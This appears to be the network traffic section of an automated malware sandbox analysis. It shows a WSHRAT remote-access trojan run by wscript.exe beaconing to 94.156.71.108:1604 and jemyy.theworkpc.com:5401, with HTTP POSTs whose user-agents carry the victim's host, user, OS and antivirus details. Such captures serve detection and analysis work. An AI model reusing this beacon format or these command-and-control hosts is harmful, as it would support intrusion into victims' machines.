                                                              Apr 19, 2024 15:28:26.802190065 CEST497471604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:26.838213921 CEST540149748109.248.151.106192.168.2.4
                                                              Apr 19, 2024 15:28:26.838313103 CEST497485401192.168.2.4109.248.151.106
                                                              Apr 19, 2024 15:28:26.838700056 CEST497485401192.168.2.4109.248.151.106
                                                              Apr 19, 2024 15:28:27.017071962 CEST16044974694.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:27.017142057 CEST497461604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:27.017280102 CEST497461604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:27.117356062 CEST540149748109.248.151.106192.168.2.4
                                                              Apr 19, 2024 15:28:27.121680975 CEST16044974794.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:27.121855021 CEST497471604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:27.122615099 CEST497471604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:27.386770964 CEST16044974694.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:27.578366041 CEST16044974794.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:32.132225990 CEST497491604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:32.235635996 CEST497501604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:32.402044058 CEST16044974994.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:32.402168989 CEST497491604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:32.402481079 CEST497491604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:32.505140066 CEST16044975094.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:32.505253077 CEST497501604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:32.505544901 CEST497501604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:32.686405897 CEST16044974994.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:32.686497927 CEST497491604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:32.686626911 CEST497491604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:32.843990088 CEST16044975094.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:32.844075918 CEST497501604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:32.844188929 CEST497501604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:32.995970964 CEST16044974994.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:33.226509094 CEST16044975094.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:38.510777950 CEST497511604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:38.654697895 CEST497521604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:38.780708075 CEST16044975194.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:38.780911922 CEST497511604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:38.781042099 CEST497511604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:38.924288988 CEST16044975294.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:38.924423933 CEST497521604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:38.924678087 CEST497521604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:39.151278973 CEST16044975194.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:39.151398897 CEST497511604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:39.151582003 CEST497511604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:39.301326990 CEST16044975294.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:39.301544905 CEST497521604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:39.301760912 CEST497521604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:39.527276039 CEST16044975194.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:39.716577053 CEST16044975294.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:44.247819901 CEST497541604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:44.404974937 CEST497551604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:44.611046076 CEST16044975494.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:44.611118078 CEST497541604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:44.611332893 CEST497541604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:44.760744095 CEST16044975594.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:44.760863066 CEST497551604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:44.761205912 CEST497551604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:45.026093006 CEST16044975494.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:45.026437044 CEST497541604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:45.026527882 CEST497541604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:45.146784067 CEST16044975594.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:45.146997929 CEST497551604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:45.146998882 CEST497551604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:45.364788055 CEST16044975494.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:45.439872980 CEST16044975594.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:50.136286974 CEST497561604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:50.254564047 CEST497571604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:50.417104006 CEST16044975694.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:50.417459965 CEST497561604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:50.417543888 CEST497561604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:50.525666952 CEST16044975794.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:50.525764942 CEST497571604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:50.526021004 CEST497571604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:50.759813070 CEST16044975694.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:50.760040045 CEST497561604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:50.760147095 CEST497561604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:50.911645889 CEST16044975794.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:50.911787033 CEST497571604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:50.911986113 CEST497571604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:51.135018110 CEST16044975694.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:51.295824051 CEST16044975794.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:55.910789013 CEST497581604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:56.054050922 CEST497591604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:56.288953066 CEST16044975894.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:56.289061069 CEST497581604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:56.289406061 CEST497581604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:56.366810083 CEST16044975994.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:56.367062092 CEST497591604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:56.367337942 CEST497591604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:56.683542967 CEST16044975894.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:56.683813095 CEST497581604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:56.683813095 CEST497581604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:56.761075974 CEST16044975994.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:56.761270046 CEST497591604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:56.762887955 CEST497591604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:28:57.140494108 CEST16044975894.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:28:57.143085957 CEST16044975994.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:01.754265070 CEST497601604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:01.803765059 CEST497611604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:02.030333042 CEST16044976094.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:02.030663013 CEST497601604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:02.031121969 CEST497601604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:02.101708889 CEST16044976194.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:02.101820946 CEST497611604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:02.102083921 CEST497611604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:02.452572107 CEST16044976094.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:02.452709913 CEST497601604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:02.452826023 CEST497601604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:02.524585009 CEST16044976194.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:02.524796009 CEST497611604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:02.524796009 CEST497611604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:02.826524973 CEST16044976094.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:02.939563990 CEST16044976194.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:07.531462908 CEST497621604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:07.618901968 CEST497631604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:07.909498930 CEST16044976294.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:07.909739971 CEST497621604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:07.909979105 CEST497621604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:07.984427929 CEST16044976394.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:07.984671116 CEST497631604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:07.984956980 CEST497631604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:08.301278114 CEST16044976294.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:08.301599979 CEST497621604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:08.301599979 CEST497621604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:08.415848970 CEST16044976394.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:08.415931940 CEST497631604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:08.416069984 CEST497631604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:08.641505957 CEST16044976294.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:08.793531895 CEST16044976394.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:13.405477047 CEST497641604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:13.496637106 CEST497651604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:13.745346069 CEST16044976494.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:13.745444059 CEST497641604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:13.745654106 CEST497641604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:13.935960054 CEST16044976594.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:13.936188936 CEST497651604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:13.936451912 CEST497651604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:14.129456997 CEST16044976494.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:14.129542112 CEST497641604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:14.129641056 CEST497641604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:14.394804955 CEST16044976594.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:14.394905090 CEST497651604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:14.394992113 CEST497651604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:14.516494989 CEST16044976494.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:14.786480904 CEST16044976594.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:19.234323025 CEST497661604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:19.481518030 CEST497671604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:19.503839970 CEST16044976694.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:19.503969908 CEST497661604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:19.504394054 CEST497661604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:19.753051043 CEST16044976794.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:19.753262043 CEST497671604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:19.753385067 CEST497671604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:19.828336954 CEST16044976694.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:19.828438044 CEST497661604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:19.828685045 CEST497661604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:20.143902063 CEST16044976794.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:20.144134045 CEST497671604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:20.146636009 CEST497671604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:20.216563940 CEST16044976694.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:20.532651901 CEST16044976794.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:24.944921970 CEST497681604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:25.221355915 CEST16044976894.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:25.221457005 CEST497681604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:25.223068953 CEST497681604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:25.233819962 CEST497691604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:25.607033968 CEST16044976894.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:25.607220888 CEST497681604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:25.607222080 CEST497681604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:25.680851936 CEST16044976994.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:25.680954933 CEST497691604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:25.681174040 CEST497691604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:25.989806890 CEST16044976894.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:26.064243078 CEST16044976994.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:26.064541101 CEST497691604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:26.064994097 CEST497691604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:26.466201067 CEST16044976994.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:30.725528955 CEST497701604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:30.996484995 CEST16044977094.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:30.996742964 CEST497701604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:30.996856928 CEST497701604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:31.192321062 CEST497711604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:31.384248018 CEST16044977094.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:31.384386063 CEST497701604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:31.384464025 CEST497701604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:31.464873075 CEST16044977194.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:31.465082884 CEST497711604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:31.465526104 CEST497711604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:31.771626949 CEST16044977094.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:31.849955082 CEST16044977194.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:31.850038052 CEST497711604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:31.850126028 CEST497711604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:32.158343077 CEST16044977194.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:36.523960114 CEST497721604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:36.802078962 CEST16044977294.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:36.802294016 CEST497721604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:36.802593946 CEST497721604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:36.971827030 CEST497731604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:37.190527916 CEST16044977294.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:37.190614939 CEST497721604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:37.190853119 CEST497721604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:37.266634941 CEST16044977394.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:37.267123938 CEST497731604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:37.267220974 CEST497731604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:37.581926107 CEST16044977294.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:37.697264910 CEST16044977394.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:37.697319984 CEST16044977394.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:37.697521925 CEST497731604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:37.722374916 CEST497731604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:38.085011959 CEST16044977394.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:42.332798958 CEST497741604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:42.605026007 CEST16044977494.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:42.605113983 CEST497741604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:42.605648994 CEST497741604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:42.838896036 CEST497751604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:42.990513086 CEST16044977494.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:42.990693092 CEST497741604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:42.990761995 CEST497741604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:43.138499022 CEST16044977594.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:43.138633966 CEST497751604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:43.138962984 CEST497751604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:43.296864986 CEST16044977494.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:43.446734905 CEST16044977594.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:43.446868896 CEST497751604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:43.447052956 CEST497751604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:43.827224970 CEST16044977594.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:48.153851986 CEST497761604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:48.530972958 CEST16044977694.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:48.531074047 CEST497761604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:48.531470060 CEST497761604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:48.576824903 CEST497771604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:48.916699886 CEST16044977694.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:48.917093992 CEST497761604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:48.917413950 CEST497761604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:49.028496981 CEST16044977794.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:49.028573990 CEST497771604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:49.028842926 CEST497771604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:49.324435949 CEST16044977694.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:49.406881094 CEST16044977794.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:49.407143116 CEST497771604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:49.407444954 CEST497771604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:49.746964931 CEST16044977794.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:50.594783068 CEST540149730109.248.151.106192.168.2.4
                                                              Apr 19, 2024 15:29:54.071415901 CEST497781604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:54.431615114 CEST16044977894.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:54.431704044 CEST497781604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:54.431929111 CEST497781604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:54.539848089 CEST497791604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:54.874085903 CEST16044977894.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:54.874213934 CEST497781604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:54.874428988 CEST497781604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:54.947731972 CEST16044977994.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:54.947846889 CEST497791604192.168.2.494.156.71.108
                                                              Apr 19, 2024 15:29:55.250315905 CEST16044977894.156.71.108192.168.2.4
                                                              Apr 19, 2024 15:29:55.612191916 CEST540149732109.248.151.106192.168.2.4
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Apr 19, 2024 15:27:51.379913092 CEST6221853192.168.2.41.1.1.1
                                                              Apr 19, 2024 15:27:51.524426937 CEST53622181.1.1.1192.168.2.4
                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Apr 19, 2024 15:27:51.379913092 CEST192.168.2.41.1.1.10x9986Standard query (0)jemyy.theworkpc.comA (IP address)IN (0x0001)false
                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Apr 19, 2024 15:27:51.524426937 CEST1.1.1.1192.168.2.40x9986No error (0)jemyy.theworkpc.com109.248.151.106A (IP address)IN (0x0001)false
                                                              • jemyy.theworkpc.com:5401
                                                              • 94.156.71.108:1604
                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.449730109.248.151.10654012316C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:27:51.758514881 CEST302OUTPOST /Vre HTTP/1.1
                                                              Accept: */*
                                                              User-Agent: JUNE_B81A4609\user-PC\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: jemyy.theworkpc.com:5401
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.44973194.156.71.10816043168C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:27:55.119296074 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.449732109.248.151.10654013084C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:27:55.840575933 CEST302OUTPOST /Vre HTTP/1.1
                                                              Accept: */*
                                                              User-Agent: JUNE_B81A4609\user-PC\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: jemyy.theworkpc.com:5401
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.44973394.156.71.10816043168C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:28:02.481379032 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.44973994.156.71.10816043168C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:28:09.257216930 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              5192.168.2.44974094.156.71.10816043052C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:28:13.842545986 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              6192.168.2.449741109.248.151.10654015428C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:28:14.717719078 CEST302OUTPOST /Vre HTTP/1.1
                                                              Accept: */*
                                                              User-Agent: JUNE_B81A4609\user-PC\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: jemyy.theworkpc.com:5401
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              7192.168.2.44974294.156.71.10816043168C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:28:15.083133936 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              8192.168.2.44974394.156.71.10816043052C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:28:20.524781942 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              9192.168.2.44974494.156.71.10816043168C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:28:20.993334055 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              10192.168.2.449745109.248.151.10654015228C:\Windows\System32\wscript.exe
